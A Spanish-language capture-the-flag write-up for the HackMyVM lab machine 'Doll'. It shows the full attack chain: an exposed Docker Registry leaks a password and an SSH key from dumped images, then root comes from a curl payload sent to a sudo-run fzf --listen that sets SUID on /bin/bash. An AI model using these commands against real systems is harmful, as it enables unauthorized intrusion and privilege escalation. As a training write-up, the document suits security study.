cd ~/blog

~/writeups/hmv/044-doll.md

044 - Doll

easy Linux hmv 12-03-2024
Exposed Docker Registry (image dump)SSH key + passphrase from imagesudo fzf --listen Privesc
hackmyvm.eu/machines/machine.php?vm=Doll

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.42
 nmap -sCV -p22,1007 -oN 02-targeted.txt 192.168.1.42
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-12 21:51 -03
Nmap scan report for 192.168.1.42
Host is up (0.00026s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 d7:32:ac:40:4b:a8:41:66:d3:d8:11:49:6c:ed:ed:4b (RSA)
|   256 81:0e:67:f8:c3:d2:50:1e:4d:09:2a:58:11:c8:d4:95 (ECDSA)
|_  256 0d:c3:7c:54:0b:9d:31:32:f2:d9:09:d3:ed:ed:93:cd (ED25519)
1007/tcp open  http    Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.56 seconds

El puerto 1007 es un Docker Registry (API 2.0) con configuración por defecto. Listamos los repositorios con curl:

 curl http://192.168.1.42:1007/v2/_catalog
{"repositories":["dolly"]}

Cargamos el manifest del repositorio dolly, que filtra una contraseña:

 curl http://192.168.1.42:1007/v2/dolly/manifests/latest
...
passwd=devilcollectsit
...

Volcamos todas las imágenes con DRG (DockerRegistryGrabber):

 python ~/Documentos/git-clones/DockerRegistryGrabber/drg.py http://192.168.1.42 -p 1007 --dump_all
[+] dolly
[+] BlobSum found 4
[+] Dumping dolly
    [+] Downloading : 5f8746267271592fd43ed8a2c03cee11a14f28793f79c0fc4ef8066dac02e017
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4
    [+] Downloading : f56be85fc22e46face30e2c3de3f7fe7c15f8fd7c4e5add29d7f64b87abdaa09

Al extraer la imagen encontramos una id_rsa del usuario bela. La clave pide passphrase, para la que usamos la contraseña del manifest:

 ssh bela@192.168.1.42 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux doll 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64
...
Last login: Tue Apr 25 10:35:13 2023 from 192.168.0.100
bela@doll:~$

Obtenemos la primera flag. Para escalar, revisamos sudo -l:

bela@doll:~$ sudo -l
Matching Defaults entries for bela on doll:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bela may run the following commands on doll:
    (ALL) NOPASSWD: /usr/bin/fzf --listen\=1337

fzf con --listen recibe instrucciones por HTTP, pero el puerto 1337 solo es accesible localmente, así que hacemos un local port forwarding:

 ssh bela@192.168.1.42 -i id_rsa -L 1337:127.0.0.1:1337
bela@doll:~$ sudo fzf --listen\=1337

Con el binario corriendo como root, le enviamos un execute para dar SUID a Bash:

 curl -X POST 127.0.0.1:1337 -d 'execute(chmod +s /bin/bash)'
bela@doll:~$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1234376 mar 27  2022 /bin/bash

Y lanzamos una shell privilegiada:

bela@doll:~$ bash -p
bash-5.1# whoami
root

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados